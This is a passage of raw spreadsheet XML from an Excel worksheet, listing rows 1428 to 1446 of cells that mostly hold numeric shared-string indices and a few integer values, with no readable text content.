      <c r="T1428" s="12" t="s">
        <v>3801</v>
      </c>
      <c r="U1428" s="12" t="s">
        <v>10628</v>
      </c>
      <c r="V1428" s="12" t="s">
        <v>1864</v>
      </c>
      <c r="W1428" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1428" s="12">
        <v>22</v>
      </c>
      <c r="Y1428" s="12" t="s">
        <v>10629</v>
      </c>
    </row>
    <row r="1429" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1429" s="12">
        <v>7936</v>
      </c>
      <c r="B1429" s="12" t="s">
        <v>29645</v>
      </c>
      <c r="D1429" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1429" s="12" t="s">
        <v>29646</v>
      </c>
      <c r="G1429" s="12" t="s">
        <v>10650</v>
      </c>
      <c r="H1429" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1429" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J1429" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1429" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1429" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M1429" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N1429" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O1429" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1429" s="12" t="s">
        <v>10038</v>
      </c>
      <c r="Q1429" s="12" t="s">
        <v>28304</v>
      </c>
      <c r="R1429" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1429" s="12" t="s">
        <v>10651</v>
      </c>
      <c r="T1429" s="12" t="s">
        <v>4934</v>
      </c>
      <c r="U1429" s="12" t="s">
        <v>10652</v>
      </c>
      <c r="V1429" s="12" t="s">
        <v>4689</v>
      </c>
      <c r="W1429" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1429" s="12">
        <v>5</v>
      </c>
      <c r="Y1429" s="12" t="s">
        <v>10653</v>
      </c>
    </row>
    <row r="1430" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1430" s="12">
        <v>7941</v>
      </c>
      <c r="B1430" s="12" t="s">
        <v>29647</v>
      </c>
      <c r="D1430" s="12" t="s">
        <v>29648</v>
      </c>
      <c r="E1430" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1430" s="12" t="s">
        <v>29649</v>
      </c>
      <c r="G1430" s="12" t="s">
        <v>10654</v>
      </c>
      <c r="H1430" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1430" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1430" s="12" t="s">
        <v>96</v>
      </c>
      <c r="K1430" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1430" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1430" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1430" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1430" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1430" s="12" t="s">
        <v>10655</v>
      </c>
      <c r="Q1430" s="12" t="s">
        <v>28266</v>
      </c>
      <c r="R1430" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1430" s="12" t="s">
        <v>10656</v>
      </c>
      <c r="T1430" s="12" t="s">
        <v>10657</v>
      </c>
      <c r="U1430" s="12" t="s">
        <v>10658</v>
      </c>
      <c r="V1430" s="12" t="s">
        <v>3902</v>
      </c>
      <c r="W1430" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1430" s="12">
        <v>5</v>
      </c>
      <c r="Y1430" s="12" t="s">
        <v>10659</v>
      </c>
    </row>
    <row r="1431" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1431" s="12">
        <v>7942</v>
      </c>
      <c r="B1431" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1431" s="12" t="s">
        <v>29650</v>
      </c>
      <c r="E1431" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1431" s="12" t="s">
        <v>29650</v>
      </c>
      <c r="G1431" s="12" t="s">
        <v>10660</v>
      </c>
      <c r="H1431" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1431" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1431" s="12" t="s">
        <v>194</v>
      </c>
      <c r="K1431" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1431" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1431" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1431" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1431" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1431" s="12" t="s">
        <v>10038</v>
      </c>
      <c r="Q1431" s="12" t="s">
        <v>28304</v>
      </c>
      <c r="R1431" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1431" s="12" t="s">
        <v>10661</v>
      </c>
      <c r="T1431" s="12" t="s">
        <v>10662</v>
      </c>
      <c r="U1431" s="12" t="s">
        <v>10663</v>
      </c>
      <c r="V1431" s="12" t="s">
        <v>4704</v>
      </c>
      <c r="W1431" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1431" s="12">
        <v>9</v>
      </c>
      <c r="Y1431" s="12" t="s">
        <v>10664</v>
      </c>
    </row>
    <row r="1432" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1432" s="12">
        <v>7943</v>
      </c>
      <c r="B1432" s="12" t="s">
        <v>29651</v>
      </c>
      <c r="C1432" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D1432" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1432" s="12" t="s">
        <v>31435</v>
      </c>
      <c r="F1432" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1432" s="12" t="s">
        <v>10665</v>
      </c>
      <c r="H1432" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1432" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J1432" s="12" t="s">
        <v>122</v>
      </c>
      <c r="K1432" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1432" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M1432" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1432" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1432" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1432" s="12" t="s">
        <v>10666</v>
      </c>
      <c r="Q1432" s="12" t="s">
        <v>28302</v>
      </c>
      <c r="R1432" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1432" s="12" t="s">
        <v>10661</v>
      </c>
      <c r="T1432" s="12" t="s">
        <v>10667</v>
      </c>
      <c r="U1432" s="12" t="s">
        <v>10668</v>
      </c>
      <c r="V1432" s="12" t="s">
        <v>200</v>
      </c>
      <c r="W1432" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1432" s="12">
        <v>18</v>
      </c>
      <c r="Y1432" s="12" t="s">
        <v>10669</v>
      </c>
    </row>
    <row r="1433" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1433" s="12">
        <v>7950</v>
      </c>
      <c r="B1433" s="12" t="s">
        <v>29652</v>
      </c>
      <c r="D1433" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E1433" s="18" t="s">
        <v>31426</v>
      </c>
      <c r="F1433" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1433" s="12" t="s">
        <v>10670</v>
      </c>
      <c r="H1433" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1433" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J1433" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1433" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1433" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M1433" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N1433" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O1433" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1433" s="12" t="s">
        <v>10038</v>
      </c>
      <c r="Q1433" s="12" t="s">
        <v>28304</v>
      </c>
      <c r="R1433" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1433" s="12" t="s">
        <v>10671</v>
      </c>
      <c r="T1433" s="12" t="s">
        <v>10672</v>
      </c>
      <c r="U1433" s="12" t="s">
        <v>10673</v>
      </c>
      <c r="V1433" s="12" t="s">
        <v>8608</v>
      </c>
      <c r="W1433" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1433" s="12">
        <v>23</v>
      </c>
      <c r="Y1433" s="12" t="s">
        <v>10674</v>
      </c>
    </row>
    <row r="1434" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1434" s="12">
        <v>7959</v>
      </c>
      <c r="B1434" s="12" t="s">
        <v>28375</v>
      </c>
      <c r="D1434" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1434" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="G1434" s="12" t="s">
        <v>10675</v>
      </c>
      <c r="H1434" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1434" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1434" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K1434" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1434" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1434" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1434" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1434" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1434" s="12" t="s">
        <v>10038</v>
      </c>
      <c r="Q1434" s="12" t="s">
        <v>28304</v>
      </c>
      <c r="R1434" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1434" s="12" t="s">
        <v>10676</v>
      </c>
      <c r="T1434" s="12" t="s">
        <v>10677</v>
      </c>
      <c r="U1434" s="12" t="s">
        <v>10678</v>
      </c>
      <c r="V1434" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W1434" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1434" s="12">
        <v>6</v>
      </c>
      <c r="Y1434" s="12" t="s">
        <v>10679</v>
      </c>
    </row>
    <row r="1435" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1435" s="12">
        <v>7960</v>
      </c>
      <c r="B1435" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C1435" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D1435" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1435" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1435" s="12" t="s">
        <v>29653</v>
      </c>
      <c r="G1435" s="12" t="s">
        <v>10680</v>
      </c>
      <c r="H1435" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1435" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1435" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K1435" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1435" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1435" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1435" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1435" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1435" s="12" t="s">
        <v>10526</v>
      </c>
      <c r="Q1435" s="12" t="s">
        <v>28304</v>
      </c>
      <c r="R1435" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1435" s="12" t="s">
        <v>10681</v>
      </c>
      <c r="T1435" s="12" t="s">
        <v>10682</v>
      </c>
      <c r="U1435" s="12" t="s">
        <v>10683</v>
      </c>
      <c r="V1435" s="12" t="s">
        <v>2992</v>
      </c>
      <c r="W1435" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1435" s="12">
        <v>35</v>
      </c>
      <c r="Y1435" s="12" t="s">
        <v>10684</v>
      </c>
    </row>
    <row r="1436" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1436" s="12">
        <v>7962</v>
      </c>
      <c r="B1436" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C1436" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D1436" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1436" s="12" t="s">
        <v>31429</v>
      </c>
      <c r="F1436" s="12" t="s">
        <v>29654</v>
      </c>
      <c r="G1436" s="12" t="s">
        <v>10685</v>
      </c>
      <c r="H1436" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1436" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J1436" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1436" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1436" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1436" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1436" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1436" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1436" s="12" t="s">
        <v>10626</v>
      </c>
      <c r="Q1436" s="12" t="s">
        <v>28304</v>
      </c>
      <c r="R1436" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1436" s="12" t="s">
        <v>10686</v>
      </c>
      <c r="T1436" s="12" t="s">
        <v>10687</v>
      </c>
      <c r="U1436" s="12" t="s">
        <v>10688</v>
      </c>
      <c r="V1436" s="12" t="s">
        <v>995</v>
      </c>
      <c r="W1436" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1436" s="12">
        <v>10</v>
      </c>
      <c r="Y1436" s="12" t="s">
        <v>10689</v>
      </c>
    </row>
    <row r="1437" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1437" s="12">
        <v>7963</v>
      </c>
      <c r="B1437" s="12" t="s">
        <v>29655</v>
      </c>
      <c r="D1437" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E1437" s="18" t="s">
        <v>31448</v>
      </c>
      <c r="F1437" s="12" t="s">
        <v>29656</v>
      </c>
      <c r="G1437" s="12" t="s">
        <v>10690</v>
      </c>
      <c r="H1437" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1437" s="12" t="s">
        <v>152</v>
      </c>
      <c r="J1437" s="12" t="s">
        <v>1476</v>
      </c>
      <c r="K1437" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1437" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1437" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1437" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1437" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1437" s="12" t="s">
        <v>10414</v>
      </c>
      <c r="Q1437" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1437" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1437" s="12" t="s">
        <v>10691</v>
      </c>
      <c r="T1437" s="12" t="s">
        <v>10692</v>
      </c>
      <c r="U1437" s="12" t="s">
        <v>10693</v>
      </c>
      <c r="V1437" s="12" t="s">
        <v>299</v>
      </c>
      <c r="W1437" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1437" s="12">
        <v>28</v>
      </c>
      <c r="Y1437" s="12" t="s">
        <v>10694</v>
      </c>
    </row>
    <row r="1438" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1438" s="12">
        <v>7968</v>
      </c>
      <c r="B1438" s="12" t="s">
        <v>29657</v>
      </c>
      <c r="D1438" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1438" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1438" s="12" t="s">
        <v>29656</v>
      </c>
      <c r="G1438" s="12" t="s">
        <v>10695</v>
      </c>
      <c r="H1438" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1438" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1438" s="12" t="s">
        <v>96</v>
      </c>
      <c r="K1438" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1438" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1438" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1438" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1438" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1438" s="12" t="s">
        <v>10038</v>
      </c>
      <c r="Q1438" s="12" t="s">
        <v>28304</v>
      </c>
      <c r="R1438" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1438" s="12" t="s">
        <v>10696</v>
      </c>
      <c r="T1438" s="12" t="s">
        <v>10384</v>
      </c>
      <c r="U1438" s="12" t="s">
        <v>10697</v>
      </c>
      <c r="V1438" s="12" t="s">
        <v>5053</v>
      </c>
      <c r="W1438" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1438" s="12">
        <v>11</v>
      </c>
      <c r="Y1438" s="12" t="s">
        <v>10698</v>
      </c>
    </row>
    <row r="1439" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1439" s="12">
        <v>7969</v>
      </c>
      <c r="B1439" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D1439" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1439" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1439" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="G1439" s="12" t="s">
        <v>10699</v>
      </c>
      <c r="H1439" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1439" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1439" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K1439" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1439" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1439" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1439" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1439" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1439" s="12" t="s">
        <v>8988</v>
      </c>
      <c r="Q1439" s="12" t="s">
        <v>28303</v>
      </c>
      <c r="R1439" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1439" s="12" t="s">
        <v>10700</v>
      </c>
      <c r="T1439" s="12" t="s">
        <v>6839</v>
      </c>
      <c r="U1439" s="12" t="s">
        <v>9750</v>
      </c>
      <c r="V1439" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W1439" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1439" s="12">
        <v>5</v>
      </c>
      <c r="Y1439" s="12" t="s">
        <v>10701</v>
      </c>
    </row>
    <row r="1440" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1440" s="12">
        <v>7974</v>
      </c>
      <c r="B1440" s="12" t="s">
        <v>29651</v>
      </c>
      <c r="C1440" s="12" t="s">
        <v>29658</v>
      </c>
      <c r="D1440" s="12" t="s">
        <v>29659</v>
      </c>
      <c r="F1440" s="12" t="s">
        <v>29660</v>
      </c>
      <c r="G1440" s="12" t="s">
        <v>10702</v>
      </c>
      <c r="H1440" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1440" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J1440" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1440" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1440" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1440" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1440" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1440" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1440" s="12" t="s">
        <v>10038</v>
      </c>
      <c r="Q1440" s="12" t="s">
        <v>28304</v>
      </c>
      <c r="R1440" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1440" s="12" t="s">
        <v>10703</v>
      </c>
      <c r="T1440" s="12" t="s">
        <v>3557</v>
      </c>
      <c r="U1440" s="12" t="s">
        <v>10704</v>
      </c>
      <c r="V1440" s="12" t="s">
        <v>323</v>
      </c>
      <c r="W1440" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1440" s="12">
        <v>20</v>
      </c>
      <c r="Y1440" s="12" t="s">
        <v>10705</v>
      </c>
    </row>
    <row r="1441" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1441" s="12">
        <v>7980</v>
      </c>
      <c r="B1441" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D1441" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F1441" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="G1441" s="12" t="s">
        <v>10706</v>
      </c>
      <c r="H1441" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1441" s="12" t="s">
        <v>525</v>
      </c>
      <c r="J1441" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1441" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1441" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1441" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1441" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1441" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1441" s="12" t="s">
        <v>10038</v>
      </c>
      <c r="Q1441" s="12" t="s">
        <v>28304</v>
      </c>
      <c r="R1441" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1441" s="12" t="s">
        <v>10707</v>
      </c>
      <c r="T1441" s="12" t="s">
        <v>10708</v>
      </c>
      <c r="U1441" s="12" t="s">
        <v>10709</v>
      </c>
      <c r="V1441" s="12" t="s">
        <v>8781</v>
      </c>
      <c r="W1441" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1441" s="12">
        <v>2</v>
      </c>
      <c r="Y1441" s="12" t="s">
        <v>10710</v>
      </c>
    </row>
    <row r="1442" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1442" s="12">
        <v>7986</v>
      </c>
      <c r="B1442" s="12" t="s">
        <v>29661</v>
      </c>
      <c r="C1442" s="12" t="s">
        <v>28414</v>
      </c>
      <c r="D1442" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1442" s="12" t="s">
        <v>29662</v>
      </c>
      <c r="G1442" s="12" t="s">
        <v>10711</v>
      </c>
      <c r="H1442" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1442" s="12" t="s">
        <v>5208</v>
      </c>
      <c r="J1442" s="12" t="s">
        <v>10712</v>
      </c>
      <c r="K1442" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1442" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M1442" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1442" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1442" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1442" s="12" t="s">
        <v>10713</v>
      </c>
      <c r="Q1442" s="12" t="s">
        <v>28303</v>
      </c>
      <c r="R1442" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1442" s="12" t="s">
        <v>10714</v>
      </c>
      <c r="T1442" s="12" t="s">
        <v>10715</v>
      </c>
      <c r="U1442" s="12" t="s">
        <v>10716</v>
      </c>
      <c r="V1442" s="12" t="s">
        <v>5211</v>
      </c>
      <c r="W1442" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1442" s="12">
        <v>17</v>
      </c>
      <c r="Y1442" s="12" t="s">
        <v>10717</v>
      </c>
    </row>
    <row r="1443" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1443" s="12">
        <v>7987</v>
      </c>
      <c r="B1443" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1443" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1443" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1443" s="12" t="s">
        <v>10718</v>
      </c>
      <c r="H1443" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1443" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J1443" s="12" t="s">
        <v>3068</v>
      </c>
      <c r="K1443" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1443" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1443" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1443" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1443" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1443" s="12" t="s">
        <v>10719</v>
      </c>
      <c r="Q1443" s="12" t="s">
        <v>28303</v>
      </c>
      <c r="R1443" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1443" s="12" t="s">
        <v>10720</v>
      </c>
      <c r="T1443" s="12" t="s">
        <v>10721</v>
      </c>
      <c r="U1443" s="12" t="s">
        <v>10722</v>
      </c>
      <c r="V1443" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W1443" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1443" s="12">
        <v>1</v>
      </c>
      <c r="Y1443" s="12" t="s">
        <v>10723</v>
      </c>
    </row>
    <row r="1444" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1444" s="12">
        <v>7992</v>
      </c>
      <c r="B1444" s="12" t="s">
        <v>29663</v>
      </c>
      <c r="D1444" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1444" s="12" t="s">
        <v>31425</v>
      </c>
      <c r="F1444" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1444" s="12" t="s">
        <v>10724</v>
      </c>
      <c r="H1444" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1444" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1444" s="12" t="s">
        <v>754</v>
      </c>
      <c r="K1444" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1444" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1444" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1444" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1444" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1444" s="12" t="s">
        <v>8988</v>
      </c>
      <c r="Q1444" s="12" t="s">
        <v>28303</v>
      </c>
      <c r="R1444" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1444" s="12" t="s">
        <v>10725</v>
      </c>
      <c r="T1444" s="12" t="s">
        <v>10726</v>
      </c>
      <c r="U1444" s="12" t="s">
        <v>10727</v>
      </c>
      <c r="V1444" s="12" t="s">
        <v>4540</v>
      </c>
      <c r="W1444" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1444" s="12">
        <v>15</v>
      </c>
      <c r="Y1444" s="12" t="s">
        <v>10728</v>
      </c>
    </row>
    <row r="1445" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1445" s="12">
        <v>7994</v>
      </c>
      <c r="B1445" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C1445" s="12" t="s">
        <v>28361</v>
      </c>
      <c r="D1445" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1445" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F1445" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1445" s="12" t="s">
        <v>10729</v>
      </c>
      <c r="H1445" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1445" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J1445" s="12" t="s">
        <v>683</v>
      </c>
      <c r="K1445" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1445" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M1445" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N1445" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O1445" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1445" s="12" t="s">
        <v>10038</v>
      </c>
      <c r="Q1445" s="12" t="s">
        <v>28304</v>
      </c>
      <c r="R1445" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1445" s="12" t="s">
        <v>10730</v>
      </c>
      <c r="T1445" s="12" t="s">
        <v>10731</v>
      </c>
      <c r="U1445" s="12" t="s">
        <v>10732</v>
      </c>
      <c r="V1445" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W1445" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1445" s="12">
        <v>8</v>
      </c>
      <c r="Y1445" s="12" t="s">
        <v>10733</v>
      </c>
    </row>
    <row r="1446" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1446" s="12">
        <v>7995</v>
      </c>
      <c r="B1446" s="12" t="s">
        <v>29657</v>
      </c>
      <c r="D1446" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1446" s="12" t="s">
        <v>31432</v>
      </c>
      <c r="F1446" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1446" s="12" t="s">
        <v>10734</v>
      </c>
      <c r="H1446" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1446" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J1446" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1446" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1446" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1446" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1446" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1446" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1446" s="12" t="s">
        <v>10038</v>
      </c>
      <c r="Q1446" s="12" t="s">
        <v>28304</v>
      </c>
      <c r="R1446" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1446" s="12" t="s">
        <v>10735</v>
      </c>
      <c r="T1446" s="12" t="s">
        <v>10081</v>
      </c>
      <c r="U1446" s="12" t="s">
        <v>10736</v>
      </c>
      <c r="V1446" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W1446" s="12" t="s">
        <v>20</v>
      </c>
